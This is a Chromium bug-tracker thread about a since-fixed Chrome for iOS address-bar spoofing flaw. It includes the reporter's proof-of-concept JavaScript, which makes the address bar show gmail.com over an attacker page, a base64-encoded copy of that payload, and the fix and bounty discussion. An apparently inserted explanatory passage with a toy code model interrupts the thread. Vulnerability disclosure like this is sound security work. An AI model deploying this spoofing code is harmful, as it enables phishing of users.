Security: Chrome Address Bar URL spoofing on IOS
Reported by
xis...@gmail.com,
Jun 22 2016
Issue description
Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_3 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/51.0.2704.64 Mobile/13G21 Safari/601.1.4
DESCRIPTION: Chrome Address Bar URL spoofing on IOS
POC:
http://xisigr.com/test/spoof/chrome/1.html
http://xisigr.com/test/spoof/chrome/2.html
,
Jun 22 2016
This appears to be the same idea as issue 599956. Since the page is actually loaded at about:blank, trying to grab cookies or the like won't work. +palmer to confirm
,
Jun 22 2016
The attack payload is:
```
<body></body>
<script>
var link = document.createElement('a');
link.href = 'https://gmail.com::';
document.body.appendChild(link);
link.click();
</script>
```
According to the severity guidelines (https://www.chromium.org/developers/severity-guidelines): "An address bar spoof where only certain URLs can be displayed, or with other mitigating factors (265221)." would be Medium. But this PoC is not subject to any such mitigations, so it's a very nice phishing attack.
eugenebut, pkl, pinkerton: Could one of you please identify an appropriate owner for this bug? Thanks!
,
Jun 22 2016
I am a good owner for this bug.
,
Jun 22 2016
,
Jun 22 2016
,
Jun 22 2016
,
Jun 22 2016
Here is what's actually happening:
1.) decidePolicyForNavigationAction: called with 'https://gmail.com::' and chrome allows the load
2.) didStartProvisionalNavigation: called with 'https://gmail.com::' which chrome adds as a pending entry.
3.) didCommitNavigation: called with 'about:blank' but chrome commits pending entry ('https://gmail.com::') and promotes it as a last committed URL
4.) didFinishNavigation: called
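The four-callback sequence above, together with the severity discussion in the earlier comment, comes down to one missing check: the pending entry set in didStartProvisionalNavigation was promoted to "last committed" in didCommitNavigation without anyone asking whether its URL was valid. The toy model below is an added illustration, not Chromium's crw_web_controller.mm; the function names, the `fixed` switch and the use of the WHATWG URL parser as the validity test are assumptions made for the example.

```javascript
// Toy model of the iOS navigation bookkeeping described in the thread
// (added illustration; not Chromium code). Chrome for iOS records a
// "pending" entry in didStartProvisionalNavigation and promotes it to
// "last committed" in didCommitNavigation. The spoof worked because the
// pending URL was promoted without a validity check, even though the
// web view had actually committed about:blank.

// Assumption: a URL is "valid" if the WHATWG URL parser accepts it.
// 'https://gmail.com::' has a malformed port, so the parser rejects it.
function isValidUrl(str) {
  try {
    new URL(str);
    return true;
  } catch (e) {
    return false;
  }
}

// Walks one navigation through the four callbacks listed in the comment.
// requestedUrl: what the page asked to load (the pending entry).
// actuallyLoadedUrl: what the web view reports in didCommitNavigation.
// fixed: false models the pre-fix promotion, true models "do not commit
// invalid URLs during web load".
function simulateNavigation(requestedUrl, actuallyLoadedUrl, fixed) {
  const state = { pending: null, lastCommitted: 'about:blank', log: [] };

  // 1.) decidePolicyForNavigationAction: the load is allowed either way.
  state.log.push('policy: allow ' + requestedUrl);

  // 2.) didStartProvisionalNavigation: requested URL becomes pending.
  state.pending = requestedUrl;
  state.log.push('start: pending=' + state.pending);

  // 3.) didCommitNavigation: old code promoted the pending entry no matter
  // what the web view reported; the fixed path refuses an invalid pending
  // URL and keeps the URL the web view actually committed.
  if (!fixed || isValidUrl(state.pending)) {
    state.lastCommitted = state.pending;
  } else {
    state.lastCommitted = actuallyLoadedUrl;
  }
  state.pending = null;
  state.log.push('commit: lastCommitted=' + state.lastCommitted);

  // 4.) didFinishNavigation: the omnibox shows the last committed URL.
  return state.lastCommitted;
}
```

Running the PoC URL through both paths shows the omnibox value the thread describes before the fix (the bogus https URL) and after it (about:blank, as in the verification comment).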
,
Jun 23 2016
,
Jun 24 2016
,
Jun 24 2016
,
Jun 24 2016
,
Jun 24 2016
,
Jun 24 2016
,
Jun 24 2016
The following revision refers to this bug: https://chromium.googlesource.com/chromium/src.git/+/5967e8c0fe0b1e11cc09d6c88304ec504e909fd5
commit 5967e8c0fe0b1e11cc09d6c88304ec504e909fd5
Author: Eugene But <eugenebut@google.com>
Date: Fri Jun 24 17:52:58 2016
[ios] Do not commit invalid URLs during web load.
BUG=622183
Review-Url: https://codereview.chromium.org/2086333003
Cr-Commit-Position: refs/heads/master@{#401761}
(cherry picked from commit c2d2b0f2f74dad0bdef196cf1657f0d584cbe3a7)
Review URL: https://codereview.chromium.org/2096023002
Cr-Commit-Position: refs/branch-heads/2743@{#467}
Cr-Branched-From: 2b3ae3b8090361f8af5a611712fc1a5ab2de53cb-refs/heads/master@{#394939}
[modify] https://crrev.com/5967e8c0fe0b1e11cc09d6c88304ec504e909fd5/ios/web/web_state/ui/crw_web_controller.mm
,
Jun 24 2016
This does not need to be merged to M51
,
Jun 27 2016
,
Jun 27 2016
Thanks for your report. We'll consider your report under the Chrome Reward Program for a security cash reward - full details here: https://www.google.com/about/appsecurity/chrome-rewards/ We'll update you once we have a decision. Feel free to check in with me in a few weeks if you haven't heard back, either by updating this bug or reaching out to me at awhalley@
,
Jun 27 2016
,
Jul 14 2016
Congratulations, the panel decided to award $3,000 for this bug! Our finance team will be in touch within a few weeks to arrange the details. <boilerplate> Please do NOT publicly disclose details until a fix has been released to all our users. Early public disclosure may cancel the provisional reward. Also, please be considerate about disclosure when the bug affects a core library that may be used by other products. Please do NOT share this information with third parties who are not directly involved in fixing the bug. Doing so may cancel the provisional reward. Please be honest if you have already disclosed anything publicly or to third parties. Lastly, we understand that some of you are not interested in money. We offer the option to donate your reward to an established charity. If you prefer this option, let us know and we will also match your donation - subject to our discretion. Any rewards that are unclaimed after 12 months will be donated to a charity of our choosing.</boilerplate>
,
Jul 14 2016
,
Jul 14 2016
Thanks! Credit as "xisigr of Tencent's Xuanwu Lab" would be good.
,
Jul 14 2016
,
Jul 20 2016
I ran both POCs reported in comment#0 and the issue is now fixed. about:blank is displayed in both the cases. Verified on M52.0.2743.82 beta, M53.0.2785.22 beta versions. Devices: iPad Air2, iPad mini, iPhone6 plus, iPhone6s. iOS: 9.3.2, 10.0. One observation here is: both of these tests are not reproducible on the current stable version of Chrome (M51) on iOS10 (i.e. even without fix).
,
Jul 25 2016
,
Aug 29 2016
,
Sep 30 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Oct 2 2016
,
Dec 9 2016
Security>UX component is deprecated in favor of the Team-Security-UX label
,
Apr 25 2018
Comment 1 by xis...@gmail.com, Jun 22 2016
POC:
```
<script>
payload="PGJvZHk+PC9ib2R5Pg0KPHNjcmlwdD4NCiAgICB2YXIgbGluayA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2EnKTsNCiAgICBsaW5rLmhyZWYgPSAnaHR0cHM6Ly9nbWFpbC5jb206Oic7DQogICAgZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChsaW5rKTsNCiAgICBsaW5rLmNsaWNrKCk7DQo8L3NjcmlwdD4=";
function pwned() {
  var t = window.open('https://www.gmail.com', 'aaaa');
  t.document.write(atob(payload));
  t.document.write("<h1>Address bar says https://www.gmail.com - this is NOT https://www.gmail.com</h1>");
}
</script>
<a href="https://hack.com::/" target="aaaa" onclick="setTimeout('pwned()','500')">click me</a><br>
```
base64 payload code:
```
<body></body>
<script>
var link = document.createElement('a');
link.href = 'https://gmail.com::';
document.body.appendChild(link);
link.click();
</script>
```